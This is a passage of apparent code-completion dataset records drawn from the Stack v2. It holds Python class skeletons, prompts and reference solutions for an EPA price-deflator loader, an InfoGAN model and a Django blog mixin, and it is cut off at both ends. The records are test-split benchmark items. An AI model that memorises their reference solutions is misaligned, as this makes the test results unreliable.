ImplicitPriceDeflators._data[year]['price_deflator']\n else:\n raise Exception(f'Missing implicit price deflator for {calendar_year} or prior')\n if max(calendar_years[calendar_years <= calendar_year]) < calendar_year:\n raise Exception(f'Missing implicit price deflator for {calendar_year}')\n return ImplicitPriceDeflators._cache[cache_key]\n<|end_body_0|>\n\n<|body_start_1|>\n analysis_basis = omega_globals.options.analysis_dollar_basis\n adj_factor_numerator = ImplicitPriceDeflators.get_price_deflator(analysis_basis)\n adj_factor_denominator = ImplicitPriceDeflators.get_price_deflator(dollar_basis_input)\n adj_factor = adj_factor_numerator / adj_factor_denominator\n return adj_factor\n<|end_body_1|>\n\n<|body_start_2|>\n ImplicitPriceDeflators._data.clear()\n ImplicitPriceDeflators._cache.clear()\n if verbose:\n omega_log.logwrite('\\nInitializing data from %s...' % filename)\n input_template_name = 'context_implicit_price_deflators'\n input_template_version = 0.22\n input_template_columns = {'calendar_year', 'price_deflator'}\n template_errors = validate_template_version_info(filename, input_template_name, input_template_version, verbose=verbose)\n if not template_errors:\n df = pd.read_csv(filename, skiprows=1)\n template_errors = validate_template_column_names(filename, input_template_columns, df.columns, verbose=verbose)\n if not template_errors:\n ImplicitPriceDeflators._data = df.set_index('calendar_year').to_dict(orient='index')\n return template_errors\n<|end_body_2|>\n", "revision_id": "afe912c57383b9de90ef30820f7977c3367a30c4", "skeleton": "<|skeleton|>\nclass ImplicitPriceDeflators:\n \"\"\"**Loads and provides access to implicit price deflators by calendar year.**\"\"\"\n\n def get_price_deflator(calendar_year):\n \"\"\"Get the implicit price deflator for the given calendar year. Args: calendar_year (int): the calendar year to get the function for Returns: The implicit price deflator for the given calendar year.\"\"\"\n <|body_0|>\n\n def dollar_adjustment_factor(dollar_basis_input):\n \"\"\"Args: dollar_basis_input (int): the dollar basis of the input value. Returns: The multiplicative factor that can be applied to a cost in dollar_basis_input to express that value in analysis_dollar_basis.\"\"\"\n <|body_1|>\n\n def init_from_file(filename, verbose=False):\n \"\"\"Initialize class data from input file. Args: filename (str): name of input file verbose (bool): enable additional console and logfile output if True Returns: List of template/input errors, else empty list on success\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ImplicitPriceDeflators:\n \"\"\"**Loads and provides access to implicit price deflators by calendar year.**\"\"\"\n\n def get_price_deflator(calendar_year):\n \"\"\"Get the implicit price deflator for the given calendar year. Args: calendar_year (int): the calendar year to get the function for Returns: The implicit price deflator for the given calendar year.\"\"\"\n cache_key = calendar_year\n if cache_key not in ImplicitPriceDeflators._cache:\n calendar_years = pd.Series(ImplicitPriceDeflators._data.keys())\n if len(calendar_years[calendar_years <= calendar_year]) > 0:\n year = max(calendar_years[calendar_years <= calendar_year])\n ImplicitPriceDeflators._cache[cache_key] = ImplicitPriceDeflators._data[year]['price_deflator']\n else:\n raise Exception(f'Missing implicit price deflator for {calendar_year} or prior')\n if max(calendar_years[calendar_years <= calendar_year]) < calendar_year:\n raise Exception(f'Missing implicit price deflator for {calendar_year}')\n return ImplicitPriceDeflators._cache[cache_key]\n\n def dollar_adjustment_factor(dollar_basis_input):\n \"\"\"Args: dollar_basis_input (int): the dollar basis of the input value. Returns: The multiplicative factor that can be applied to a cost in dollar_basis_input to express that value in analysis_dollar_basis.\"\"\"\n analysis_basis = omega_globals.options.analysis_dollar_basis\n adj_factor_numerator = ImplicitPriceDeflators.get_price_deflator(analysis_basis)\n adj_factor_denominator = ImplicitPriceDeflators.get_price_deflator(dollar_basis_input)\n adj_factor = adj_factor_numerator / adj_factor_denominator\n return adj_factor\n\n def init_from_file(filename, verbose=False):\n \"\"\"Initialize class data from input file. Args: filename (str): name of input file verbose (bool): enable additional console and logfile output if True Returns: List of template/input errors, else empty list on success\"\"\"\n ImplicitPriceDeflators._data.clear()\n ImplicitPriceDeflators._cache.clear()\n if verbose:\n omega_log.logwrite('\\nInitializing data from %s...' % filename)\n input_template_name = 'context_implicit_price_deflators'\n input_template_version = 0.22\n input_template_columns = {'calendar_year', 'price_deflator'}\n template_errors = validate_template_version_info(filename, input_template_name, input_template_version, verbose=verbose)\n if not template_errors:\n df = pd.read_csv(filename, skiprows=1)\n template_errors = validate_template_column_names(filename, input_template_columns, df.columns, verbose=verbose)\n if not template_errors:\n ImplicitPriceDeflators._data = df.set_index('calendar_year').to_dict(orient='index')\n return template_errors\n", "source": "the_stack_v2_python_sparse", "source_path": "omega_model/context/ip_deflators.py", "source_repo": "USEPA/EPA_OMEGA_Model", "split": "test", "star_events_count": 17} {"blob_id": "536df71401a84e09bfde81ec684ace3abfcdf8b1", "bodies": ["super().__init__()\nself.generator = generator_cls(latent_dim, n_classes, code_dim, img_size, num_channels)\nself.discriminator = discriminator_cls(code_dim, n_classes, num_channels, img_size)\nself._n_classes = n_classes\nself._latent_dim = latent_dim\nself._code_dim = code_dim\nself.lambda_cat = lambda_cat\nself.lambda_cont = lambda_cont\nself.generator.apply(weights_init_normal)\nself.discriminator.apply(weights_init_normal)", "if z is None:\n z = torch.randn(imgs.size(0), self._latent_dim, device=imgs.device, dtype=imgs.dtype)\nif labels is None:\n labels = torch.randint(self._n_classes, (imgs.size(0), 1), device=imgs.device, dtype=torch.long)\nif labels.size(-1) != self._n_classes:\n labels = one_hot_batch(labels.unsqueeze(1), num_classes=self._n_classes)\nif code is None:\n code = torch.empty(imgs.size(0), self._code_dim, device=imgs.device, dtype=imgs.dtype)\n code.uniform_(-1, 1)\ngen_imgs = self.generator(z, labels, code)\nvalidity_real, _, _ = self.discriminator(imgs)\nvalidity_fake, labels_fake, code_fake = self.discriminator(gen_imgs)\nreturn {'validity_real': validity_real, 'validity_fake': validity_fake, 'labels_real': labels, 'labels_fake': labels_fake, 'code_real': code, 'code_fake': code_fake, 'gen_imgs': gen_imgs}"], "bodies_text": "<|body_start_0|>\n super().__init__()\n self.generator = generator_cls(latent_dim, n_classes, code_dim, img_size, num_channels)\n self.discriminator = discriminator_cls(code_dim, n_classes, num_channels, img_size)\n self._n_classes = n_classes\n self._latent_dim = latent_dim\n self._code_dim = code_dim\n self.lambda_cat = lambda_cat\n self.lambda_cont = lambda_cont\n self.generator.apply(weights_init_normal)\n self.discriminator.apply(weights_init_normal)\n<|end_body_0|>\n\n<|body_start_1|>\n if z is None:\n z = torch.randn(imgs.size(0), self._latent_dim, device=imgs.device, dtype=imgs.dtype)\n if labels is None:\n labels = torch.randint(self._n_classes, (imgs.size(0), 1), device=imgs.device, dtype=torch.long)\n if labels.size(-1) != self._n_classes:\n labels = one_hot_batch(labels.unsqueeze(1), num_classes=self._n_classes)\n if code is None:\n code = torch.empty(imgs.size(0), self._code_dim, device=imgs.device, dtype=imgs.dtype)\n code.uniform_(-1, 1)\n gen_imgs = self.generator(z, labels, code)\n validity_real, _, _ = self.discriminator(imgs)\n validity_fake, labels_fake, code_fake = self.discriminator(gen_imgs)\n return {'validity_real': validity_real, 'validity_fake': validity_fake, 'labels_real': labels, 'labels_fake': labels_fake, 'code_real': code, 'code_fake': code_fake, 'gen_imgs': gen_imgs}\n<|end_body_1|>\n", "class_docstring": "Class implementing the Information Maximization Generative Adversarial Networks. References ---------- `Paper `_ Warnings -------- This Network is designed for training only; if you want to predict from an already trained network, it might be best, to split this network into its parts (i. e. separating the discriminator from the generator). This will give a significant boost in inference speed and a significant decrease in memory consumption, since no memory is allocated for additional weights of the unused parts and no inference is done for them. If this whole network is used, inferences might be done multiple times per network, to obtain all necessary (int", "class_name": "InfoGAN", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass InfoGAN:\n \"\"\"Class implementing the Information Maximization Generative Adversarial Networks. References ---------- `Paper `_ Warnings -------- This Network is designed for training only; if you want to predict from an already trained network, it might be best, to split this network into its parts (i. e. separating the discriminator from the generator). This will give a significant boost in inference speed and a significant decrease in memory consumption, since no memory is allocated for additional weights of the unused parts and no inference is done for them. If this whole network is used, inferences might be done multiple times per network, to obtain all necessary (int\"\"\"\n\n def __init__(self, latent_dim, n_classes, code_dim, img_size, num_channels, lambda_cat=1.0, lambda_cont=0.1, generator_cls=Generator, discriminator_cls=Discriminator):\n \"\"\"Parameters ---------- latent_dim : int the size of the latent dimension n_classes : int the number of classes code_dim : int the size of the code dimension img_size : int the number of pixels per image side num_channels : int number of image channels lambda_cat : float weighting factor specifying the impact of the categorical loss onto the info-loss lambda_cont : float weighting factor specifying the impact of the continuous loss onto the info loss generator_cls : class implementing the actual generator topology discriminator_cls : class implementing the actual discriminator topology\"\"\"\n <|body_0|>\n\n def forward(self, imgs, labels=None, z=None, code=None):\n \"\"\"Forwards a single set of batches through the network Parameters ---------- imgs : :class:`torch.Tensor` the image batch labels : :class:`torch.Tensor` the labels batch, will be sampled if not given z : :class:`torch.Tensor` the noise batch, will be sampled if not given code : :class:`torch.Tensor` the code batch, will be sampled if not given Returns ------- dict a dictionary containing all (intermediate) results for loss calculation and training\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__()\n self.generator = generator_cls(latent_dim, n_classes, code_dim, img_size, num_channels)\n self.discriminator = discriminator_cls(code_dim, n_classes, num_channels, img_size)\n self._n_classes = n_classes\n self._latent_dim = latent_dim\n self._code_dim = code_dim\n self.lambda_cat = lambda_cat\n self.lambda_cont = lambda_cont\n self.generator.apply(weights_init_normal)\n self.discriminator.apply(weights_init_normal)\n<|end_body_0|>\n\n<|body_start_1|>\n if z is None:\n z = torch.randn(imgs.size(0), self._latent_dim, device=imgs.device, dtype=imgs.dtype)\n if labels is None:\n labels = torch.randint(self._n_classes, (imgs.size(0), 1), device=imgs.device, dtype=torch.long)\n if labels.size(-1) != self._n_classes:\n labels = one_hot_batch(labels.unsqueeze(1), num_classes=self._n_classes)\n if code is None:\n code = torch.empty(imgs.size(0), self._code_dim, device=imgs.device, dtype=imgs.dtype)\n code.uniform_(-1, 1)\n gen_imgs = self.generator(z, labels, code)\n validity_real, _, _ = self.discriminator(imgs)\n validity_fake, labels_fake, code_fake = self.discriminator(gen_imgs)\n return {'validity_real': validity_real, 'validity_fake': validity_fake, 'labels_real': labels, 'labels_fake': labels_fake, 'code_real': code, 'code_fake': code_fake, 'gen_imgs': gen_imgs}\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000185", "length_bytes": 6693, "license_type": "permissive", "methods": [{"docstring": "Parameters ---------- latent_dim : int the size of the latent dimension n_classes : int the number of classes code_dim : int the size of the code dimension img_size : int the number of pixels per image side num_channels : int number of image channels lambda_cat : float weighting factor specifying the impact of the categorical loss onto the info-loss lambda_cont : float weighting factor specifying the impact of the continuous loss onto the info loss generator_cls : class implementing the actual generator topology discriminator_cls : class implementing the actual discriminator topology", "name": "__init__", "signature": "def __init__(self, latent_dim, n_classes, code_dim, img_size, num_channels, lambda_cat=1.0, lambda_cont=0.1, generator_cls=Generator, discriminator_cls=Discriminator)"}, {"docstring": "Forwards a single set of batches through the network Parameters ---------- imgs : :class:`torch.Tensor` the image batch labels : :class:`torch.Tensor` the labels batch, will be sampled if not given z : :class:`torch.Tensor` the noise batch, will be sampled if not given code : :class:`torch.Tensor` the code batch, will be sampled if not given Returns ------- dict a dictionary containing all (intermediate) results for loss calculation and training", "name": "forward", "signature": "def forward(self, imgs, labels=None, z=None, code=None)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_006029", "prompt": "Implement the Python class `InfoGAN` described below.\n\nClass description:\nClass implementing the Information Maximization Generative Adversarial Networks. References ---------- `Paper `_ Warnings -------- This Network is designed for training only; if you want to predict from an already trained network, it might be best, to split this network into its parts (i. e. separating the discriminator from the generator). This will give a significant boost in inference speed and a significant decrease in memory consumption, since no memory is allocated for additional weights of the unused parts and no inference is done for them. If this whole network is used, inferences might be done multiple times per network, to obtain all necessary (int\n\nMethod signatures and docstrings:\n- def __init__(self, latent_dim, n_classes, code_dim, img_size, num_channels, lambda_cat=1.0, lambda_cont=0.1, generator_cls=Generator, discriminator_cls=Discriminator): Parameters ---------- latent_dim : int the size of the latent dimension n_classes : int the number of classes code_dim : int the size of the code dimension img_size : int the number of pixels per image side num_channels : int number of image channels lambda_cat : float weighting factor specifying the impact of the categorical loss onto the info-loss lambda_cont : float weighting factor specifying the impact of the continuous loss onto the info loss generator_cls : class implementing the actual generator topology discriminator_cls : class implementing the actual discriminator topology\n- def forward(self, imgs, labels=None, z=None, code=None): Forwards a single set of batches through the network Parameters ---------- imgs : :class:`torch.Tensor` the image batch labels : :class:`torch.Tensor` the labels batch, will be sampled if not given z : :class:`torch.Tensor` the noise batch, will be sampled if not given code : :class:`torch.Tensor` the code batch, will be sampled if not given Returns ------- dict a dictionary containing all (intermediate) results for loss calculation and training", "prompted_full_text": "Implement the Python class `InfoGAN` described below.\n\nClass description:\nClass implementing the Information Maximization Generative Adversarial Networks. References ---------- `Paper `_ Warnings -------- This Network is designed for training only; if you want to predict from an already trained network, it might be best, to split this network into its parts (i. e. separating the discriminator from the generator). This will give a significant boost in inference speed and a significant decrease in memory consumption, since no memory is allocated for additional weights of the unused parts and no inference is done for them. If this whole network is used, inferences might be done multiple times per network, to obtain all necessary (int\n\nMethod signatures and docstrings:\n- def __init__(self, latent_dim, n_classes, code_dim, img_size, num_channels, lambda_cat=1.0, lambda_cont=0.1, generator_cls=Generator, discriminator_cls=Discriminator): Parameters ---------- latent_dim : int the size of the latent dimension n_classes : int the number of classes code_dim : int the size of the code dimension img_size : int the number of pixels per image side num_channels : int number of image channels lambda_cat : float weighting factor specifying the impact of the categorical loss onto the info-loss lambda_cont : float weighting factor specifying the impact of the continuous loss onto the info loss generator_cls : class implementing the actual generator topology discriminator_cls : class implementing the actual discriminator topology\n- def forward(self, imgs, labels=None, z=None, code=None): Forwards a single set of batches through the network Parameters ---------- imgs : :class:`torch.Tensor` the image batch labels : :class:`torch.Tensor` the labels batch, will be sampled if not given z : :class:`torch.Tensor` the noise batch, will be sampled if not given code : :class:`torch.Tensor` the code batch, will be sampled if not given Returns ------- dict a dictionary containing all (intermediate) results for loss calculation and training\n\n<|skeleton|>\nclass InfoGAN:\n \"\"\"Class implementing the Information Maximization Generative Adversarial Networks. References ---------- `Paper `_ Warnings -------- This Network is designed for training only; if you want to predict from an already trained network, it might be best, to split this network into its parts (i. e. separating the discriminator from the generator). This will give a significant boost in inference speed and a significant decrease in memory consumption, since no memory is allocated for additional weights of the unused parts and no inference is done for them. If this whole network is used, inferences might be done multiple times per network, to obtain all necessary (int\"\"\"\n\n def __init__(self, latent_dim, n_classes, code_dim, img_size, num_channels, lambda_cat=1.0, lambda_cont=0.1, generator_cls=Generator, discriminator_cls=Discriminator):\n \"\"\"Parameters ---------- latent_dim : int the size of the latent dimension n_classes : int the number of classes code_dim : int the size of the code dimension img_size : int the number of pixels per image side num_channels : int number of image channels lambda_cat : float weighting factor specifying the impact of the categorical loss onto the info-loss lambda_cont : float weighting factor specifying the impact of the continuous loss onto the info loss generator_cls : class implementing the actual generator topology discriminator_cls : class implementing the actual discriminator topology\"\"\"\n <|body_0|>\n\n def forward(self, imgs, labels=None, z=None, code=None):\n \"\"\"Forwards a single set of batches through the network Parameters ---------- imgs : :class:`torch.Tensor` the image batch labels : :class:`torch.Tensor` the labels batch, will be sampled if not given z : :class:`torch.Tensor` the noise batch, will be sampled if not given code : :class:`torch.Tensor` the code batch, will be sampled if not given Returns ------- dict a dictionary containing all (intermediate) results for loss calculation and training\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__()\n self.generator = generator_cls(latent_dim, n_classes, code_dim, img_size, num_channels)\n self.discriminator = discriminator_cls(code_dim, n_classes, num_channels, img_size)\n self._n_classes = n_classes\n self._latent_dim = latent_dim\n self._code_dim = code_dim\n self.lambda_cat = lambda_cat\n self.lambda_cont = lambda_cont\n self.generator.apply(weights_init_normal)\n self.discriminator.apply(weights_init_normal)\n<|end_body_0|>\n\n<|body_start_1|>\n if z is None:\n z = torch.randn(imgs.size(0), self._latent_dim, device=imgs.device, dtype=imgs.dtype)\n if labels is None:\n labels = torch.randint(self._n_classes, (imgs.size(0), 1), device=imgs.device, dtype=torch.long)\n if labels.size(-1) != self._n_classes:\n labels = one_hot_batch(labels.unsqueeze(1), num_classes=self._n_classes)\n if code is None:\n code = torch.empty(imgs.size(0), self._code_dim, device=imgs.device, dtype=imgs.dtype)\n code.uniform_(-1, 1)\n gen_imgs = self.generator(z, labels, code)\n validity_real, _, _ = self.discriminator(imgs)\n validity_fake, labels_fake, code_fake = self.discriminator(gen_imgs)\n return {'validity_real': validity_real, 'validity_fake': validity_fake, 'labels_real': labels, 'labels_fake': labels_fake, 'code_real': code, 'code_fake': code_fake, 'gen_imgs': gen_imgs}\n<|end_body_1|>\n", "revision_id": "1078f5030b8aac2bf022daf5fa14d66f74c3c893", "skeleton": "<|skeleton|>\nclass InfoGAN:\n \"\"\"Class implementing the Information Maximization Generative Adversarial Networks. References ---------- `Paper `_ Warnings -------- This Network is designed for training only; if you want to predict from an already trained network, it might be best, to split this network into its parts (i. e. separating the discriminator from the generator). This will give a significant boost in inference speed and a significant decrease in memory consumption, since no memory is allocated for additional weights of the unused parts and no inference is done for them. If this whole network is used, inferences might be done multiple times per network, to obtain all necessary (int\"\"\"\n\n def __init__(self, latent_dim, n_classes, code_dim, img_size, num_channels, lambda_cat=1.0, lambda_cont=0.1, generator_cls=Generator, discriminator_cls=Discriminator):\n \"\"\"Parameters ---------- latent_dim : int the size of the latent dimension n_classes : int the number of classes code_dim : int the size of the code dimension img_size : int the number of pixels per image side num_channels : int number of image channels lambda_cat : float weighting factor specifying the impact of the categorical loss onto the info-loss lambda_cont : float weighting factor specifying the impact of the continuous loss onto the info loss generator_cls : class implementing the actual generator topology discriminator_cls : class implementing the actual discriminator topology\"\"\"\n <|body_0|>\n\n def forward(self, imgs, labels=None, z=None, code=None):\n \"\"\"Forwards a single set of batches through the network Parameters ---------- imgs : :class:`torch.Tensor` the image batch labels : :class:`torch.Tensor` the labels batch, will be sampled if not given z : :class:`torch.Tensor` the noise batch, will be sampled if not given code : :class:`torch.Tensor` the code batch, will be sampled if not given Returns ------- dict a dictionary containing all (intermediate) results for loss calculation and training\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class InfoGAN:\n \"\"\"Class implementing the Information Maximization Generative Adversarial Networks. References ---------- `Paper `_ Warnings -------- This Network is designed for training only; if you want to predict from an already trained network, it might be best, to split this network into its parts (i. e. separating the discriminator from the generator). This will give a significant boost in inference speed and a significant decrease in memory consumption, since no memory is allocated for additional weights of the unused parts and no inference is done for them. If this whole network is used, inferences might be done multiple times per network, to obtain all necessary (int\"\"\"\n\n def __init__(self, latent_dim, n_classes, code_dim, img_size, num_channels, lambda_cat=1.0, lambda_cont=0.1, generator_cls=Generator, discriminator_cls=Discriminator):\n \"\"\"Parameters ---------- latent_dim : int the size of the latent dimension n_classes : int the number of classes code_dim : int the size of the code dimension img_size : int the number of pixels per image side num_channels : int number of image channels lambda_cat : float weighting factor specifying the impact of the categorical loss onto the info-loss lambda_cont : float weighting factor specifying the impact of the continuous loss onto the info loss generator_cls : class implementing the actual generator topology discriminator_cls : class implementing the actual discriminator topology\"\"\"\n super().__init__()\n self.generator = generator_cls(latent_dim, n_classes, code_dim, img_size, num_channels)\n self.discriminator = discriminator_cls(code_dim, n_classes, num_channels, img_size)\n self._n_classes = n_classes\n self._latent_dim = latent_dim\n self._code_dim = code_dim\n self.lambda_cat = lambda_cat\n self.lambda_cont = lambda_cont\n self.generator.apply(weights_init_normal)\n self.discriminator.apply(weights_init_normal)\n\n def forward(self, imgs, labels=None, z=None, code=None):\n \"\"\"Forwards a single set of batches through the network Parameters ---------- imgs : :class:`torch.Tensor` the image batch labels : :class:`torch.Tensor` the labels batch, will be sampled if not given z : :class:`torch.Tensor` the noise batch, will be sampled if not given code : :class:`torch.Tensor` the code batch, will be sampled if not given Returns ------- dict a dictionary containing all (intermediate) results for loss calculation and training\"\"\"\n if z is None:\n z = torch.randn(imgs.size(0), self._latent_dim, device=imgs.device, dtype=imgs.dtype)\n if labels is None:\n labels = torch.randint(self._n_classes, (imgs.size(0), 1), device=imgs.device, dtype=torch.long)\n if labels.size(-1) != self._n_classes:\n labels = one_hot_batch(labels.unsqueeze(1), num_classes=self._n_classes)\n if code is None:\n code = torch.empty(imgs.size(0), self._code_dim, device=imgs.device, dtype=imgs.dtype)\n code.uniform_(-1, 1)\n gen_imgs = self.generator(z, labels, code)\n validity_real, _, _ = self.discriminator(imgs)\n validity_fake, labels_fake, code_fake = self.discriminator(gen_imgs)\n return {'validity_real': validity_real, 'validity_fake': validity_fake, 'labels_real': labels, 'labels_fake': labels_fake, 'code_real': code, 'code_fake': code_fake, 'gen_imgs': gen_imgs}\n", "source": "the_stack_v2_python_sparse", "source_path": "dlutils/models/gans/info/info_gan.py", "source_repo": "justusschock/dl-utils", "split": "test", "star_events_count": 15} {"blob_id": "8b3aaf3bd64ee5974784f01d2050272f652f9b50", "bodies": ["archive = models.Entry.objects.filter(is_published=True).order_by('-pub_date')\nif not archive:\n return {'list': archive, 'display_year': None, 'display_month': None}\nif display_year is None and display_month is None:\n display_year, display_month = (archive[0].pub_date.year, archive[0].pub_date.month)\nelif display_year is not None and display_month is None:\n display_month = archive.filter(pub_date__year=display_year).order_by('-pub_date')[0].pub_date.month\nreturn {'list': archive, 'display_year': display_year, 'display_month': display_month}", "data = models.Tag.objects.annotate(num_entries=Count('entries')).filter(num_entries__gt=0).aggregate(mode=Mode('num_entries'), mean=Avg('num_entries'), std_dev=StdDev('num_entries'))\nmode, mean, std_dev = (data['mode'], data['mean'], data['std_dev'])\nif not mode and (not mean) and (not std_dev):\n return []\nreturn models.Tag.objects.annotate(num_entries=Count('entries')).filter(num_entries__gt=0).annotate(category=Case(When(num_entries__gt=mean + std_dev, then=Value('upper')), When(num_entries__lt=mean - std_dev, then=Value('lower')), default=Value('avg'), output_field=CharField()))", "if not query_set:\n return (query_set, None, None, 0)\ntotal = query_set.count()\ntotal_pages, orphans = divmod(total, self.max_per_page)\nstart_elem = (page - 1) * self.max_per_page\nremaining = total - (page - 1) * self.max_per_page\nif remaining >= self.max_per_page + self.pagination_orphans:\n query_set, next_page, prev_page = (query_set[start_elem:start_elem + self.max_per_page], page + 1, page - 1 if page > 1 else None)\nelse:\n query_set, next_page, prev_page = (query_set[start_elem:], None, page - 1 if page > 1 else None)\nreturn (query_set, prev_page, next_page, total_pages if orphans < self.pagination_orphans else total_pages + 1)"], "bodies_text": "<|body_start_0|>\n archive = models.Entry.objects.filter(is_published=True).order_by('-pub_date')\n if not archive:\n return {'list': archive, 'display_year': None, 'display_month': None}\n if display_year is None and display_month is None:\n display_year, display_month = (archive[0].pub_date.year, archive[0].pub_date.month)\n elif display_year is not None and display_month is None:\n display_month = archive.filter(pub_date__year=display_year).order_by('-pub_date')[0].pub_date.month\n return {'list': archive, 'display_year': display_year, 'display_month': display_month}\n<|end_body_0|>\n\n<|body_start_1|>\n data = models.Tag.objects.annotate(num_entries=Count('entries')).filter(num_entries__gt=0).aggregate(mode=Mode('num_entries'), mean=Avg('num_entries'), std_dev=StdDev('num_entries'))\n mode, mean, std_dev = (data['mode'], data['mean'], data['std_dev'])\n if not mode and (not mean) and (not std_dev):\n return []\n return models.Tag.objects.annotate(num_entries=Count('entries')).filter(num_entries__gt=0).annotate(category=Case(When(num_entries__gt=mean + std_dev, then=Value('upper')), When(num_entries__lt=mean - std_dev, then=Value('lower')), default=Value('avg'), output_field=CharField()))\n<|end_body_1|>\n\n<|body_start_2|>\n if not query_set:\n return (query_set, None, None, 0)\n total = query_set.count()\n total_pages, orphans = divmod(total, self.max_per_page)\n start_elem = (page - 1) * self.max_per_page\n remaining = total - (page - 1) * self.max_per_page\n if remaining >= self.max_per_page + self.pagination_orphans:\n query_set, next_page, prev_page = (query_set[start_elem:start_elem + self.max_per_page], page + 1, page - 1 if page > 1 else None)\n else:\n query_set, next_page, prev_page = (query_set[start_elem:], None, page - 1 if page > 1 else None)\n return (query_set, prev_page, next_page, total_pages if orphans < self.pagination_orphans else total_pages + 1)\n<|end_body_2|>\n", "class_docstring": "", "class_name": "BlogMixin", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass BlogMixin:\n\n def get_archive(request, display_year=None, display_month=None):\n \"\"\"Generate a query set which list which provides a calendarised archive :param request : The WSGI request which triggers this archive display, used to identify if draft documents should be displayed. :param display_year : The year (integer or None) which should be opened by default when this archive is displayed :param display_month : The month (integer or None) which should be opened by default when this archive is displayed\"\"\"\n <|body_0|>\n\n def get_tag_cloud():\n \"\"\"Fetch the tag cloud data - categorise the Tags as upper, Average or lower Categorisation based on whether they are above or below average (mean) Maybe better to use MODE - i.e. the most frequent count. Using mode ensures that the largest number of labels are in the 'average' category\"\"\"\n <|body_1|>\n\n def pagination(self, query_set, page, url_args):\n \"\"\"Split the query set into pages based on the instance paging attributes :param query_set : The fully ordered query set of all the posts filtered by Tag or date :param page : The page being requested :param url_args : The set of arguments required to create the url :return A tuple of the query_set, the url for the previous page, and a url for the next page\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n archive = models.Entry.objects.filter(is_published=True).order_by('-pub_date')\n if not archive:\n return {'list': archive, 'display_year': None, 'display_month': None}\n if display_year is None and display_month is None:\n display_year, display_month = (archive[0].pub_date.year, archive[0].pub_date.month)\n elif display_year is not None and display_month is None:\n display_month = archive.filter(pub_date__year=display_year).order_by('-pub_date')[0].pub_date.month\n return {'list': archive, 'display_year': display_year, 'display_month': display_month}\n<|end_body_0|>\n\n<|body_start_1|>\n data = models.Tag.objects.annotate(num_entries=Count('entries')).filter(num_entries__gt=0).aggregate(mode=Mode('num_entries'), mean=Avg('num_entries'), std_dev=StdDev('num_entries'))\n mode, mean, std_dev = (data['mode'], data['mean'], data['std_dev'])\n if not mode and (not mean) and (not std_dev):\n return []\n return models.Tag.objects.annotate(num_entries=Count('entries')).filter(num_entries__gt=0).annotate(category=Case(When(num_entries__gt=mean + std_dev, then=Value('upper')), When(num_entries__lt=mean - std_dev, then=Value('lower')), default=Value('avg'), output_field=CharField()))\n<|end_body_1|>\n\n<|body_start_2|>\n if not query_set:\n return (query_set, None, None, 0)\n total = query_set.count()\n total_pages, orphans = divmod(total, self.max_per_page)\n start_elem = (page - 1) * self.max_per_page\n remaining = total - (page - 1) * self.max_per_page\n if remaining >= self.max_per_page + self.pagination_orphans:\n query_set, next_page, prev_page = (query_set[start_elem:start_elem + self.max_per_page], page + 1, page - 1 if page > 1 else None)\n else:\n query_set, next_page, prev_page = (query_set[start_elem:], None, page - 1 if page > 1 else None)\n return (query_set, prev_page, next_page, total_pages if orphans < self.pagination_orphans else total_pages + 1)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000186", "length_bytes": 7485, "license_type": "no_license", "methods": [{"docstring": "Generate a query set which list which provides a calendarised archive :param request : The WSGI request which triggers this archive display, used to identify if draft documents should be displayed. :param display_year : The year (integer or None) which should be opened by default when this archive is displayed :param display_month : The month (integer or None) which should be opened by default when this archive is displayed", "name": "get_archive", "signature": "def get_archive(request, display_year=None, display_month=None)"}, {"docstring": "Fetch the tag cloud data - categorise the Tags as upper, Average or lower Categorisation based on whether they are above or below average (mean) Maybe better to use MODE - i.e. the most frequent count. Using mode ensures that the largest number of labels are in the 'average' category", "name": "get_tag_cloud", "signature": "def get_tag_cloud()"}, {"docstring": "Split the query set into pages based on the instance paging attributes :param query_set : The fully ordered query set of all the posts filtered by Tag or date :param page : The page being requested :param url_args : The set of arguments required to create the url :return A tuple of the query_set, the url for the previous page, and a url for the next page", "name": "pagination", "signature": "def pagination(self, query_set, page, url_args)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_002039", "prompt": "Implement the Python class `BlogMixin` described below.\n\nClass description:\nImplement the BlogMixin class.\n\nMethod signatures and docstrings:\n- def get_archive(request, display_year=None, display_month=None): Generate a query set which list which provides a calendarised archive :param request : The WSGI request which triggers this archive display, used to identify if draft documents should be displayed. :param display_year : The year (integer or None) which should be opened by default when this archive is displayed :param display_month : The month (integer or None) which should be opened by default when this archive is displayed\n- def get_tag_cloud(): Fetch the tag cloud data - categorise the Tags as upper, Average or lower Categorisation based on whether they are above or below average (mean) Maybe better to use MODE - i.e. the most frequent count. Using mode ensures that the largest number of labels are in the 'average' category\n- def pagination(self, query_set, page, url_args): Split the query set into pages based on the instance paging attributes :param query_set : The fully ordered query set of all the posts filtered by Tag or date :param page : The page being requested :param url_args : The set of arguments required to create the url :return A tuple of the query_set, the url for the previous page, and a url for the next page", "prompted_full_text": "Implement the Python class `BlogMixin` described below.\n\nClass description:\nImplement the BlogMixin class.\n\nMethod signatures and docstrings:\n- def get_archive(request, display_year=None, display_month=None): Generate a query set which list which provides a calendarised archive :param request : The WSGI request which triggers this archive display, used to identify if draft documents should be displayed. :param display_year : The year (integer or None) which should be opened by default when this archive is displayed :param display_month : The month (integer or None) which should be opened by default when this archive is displayed\n- def get_tag_cloud(): Fetch the tag cloud data - categorise the Tags as upper, Average or lower Categorisation based on whether they are above or below average (mean) Maybe better to use MODE - i.e. the most frequent count. Using mode ensures that the largest number of labels are in the 'average' category\n- def pagination(self, query_set, page, url_args): Split the query set into pages based on the instance paging attributes :param query_set : The fully ordered query set of all the posts filtered by Tag or date :param page : The page being requested :param url_args : The set of arguments required to create the url :return A tuple of the query_set, the url for the previous page, and a url for the next 